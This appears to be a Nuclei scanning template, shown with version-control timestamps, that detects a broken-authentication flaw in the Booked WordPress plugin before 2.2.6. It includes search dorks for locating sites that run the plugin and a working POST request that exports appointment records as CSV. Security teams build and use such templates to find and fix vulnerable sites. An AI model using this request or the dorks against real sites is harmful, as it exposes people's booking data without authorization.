2023-07-24 16:07:25 +00:00
id : booked-export-csv
info :
2023-07-26 05:40:31 +00:00
name : Booked < 2.2.6 - Broken Authentication
2023-07-24 16:07:25 +00:00
author : random-robbie
severity : high
description : |
The Booked plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions hooked via AJAX actions in versions up to, and including, 2.2.5. This makes it possible for authenticated attackers with subscriber-level permissions and above to execute several unauthorized actions.
remediation : Fixed in version 2.2.6
reference :
- https://codecanyon.net/item/booked-appointments-appointment-booking-for-wordpress/9466968
- http://boxyupdates.com/changelog.php?p=booked
- https://wpscan.com/vulnerability/10107
metadata :
2023-07-26 05:40:31 +00:00
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2023-07-24 16:07:25 +00:00
fofa-query : "wp-content/plugins/booked/"
2023-10-14 11:27:55 +00:00
publicwww-query : "/wp-content/plugins/booked/"
2023-07-24 16:07:25 +00:00
google-query : inurl:"/wp-content/plugins/booked/"
2023-07-26 05:40:31 +00:00
tags : wordpress,wpscan,wp-plugin,wp,booked,bypass
2023-07-24 16:10:43 +00:00
2023-07-24 16:07:25 +00:00
http :
- raw :
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
booked_export_appointments_csv=
matchers-condition : and
matchers :
- type : word
part : body
words :
- "End Time"
- "Start Time"
- "Calendar"
condition : and
- type : word
part : header
words :
- text/csv
- type : status
status :
- 200
2023-10-19 13:13:52 +00:00
# digest: 490a0046304402200db5cb115b1bff83639450515ea6bf1a039f02fba337ac6d20ba4c2e9a0795f602200d97f3b9ea9d40eeec6b70cdc4d8f68747265ebc83fbc650f251b1ee75bb5e0f:922c64590222798bb761d5b6d8e72950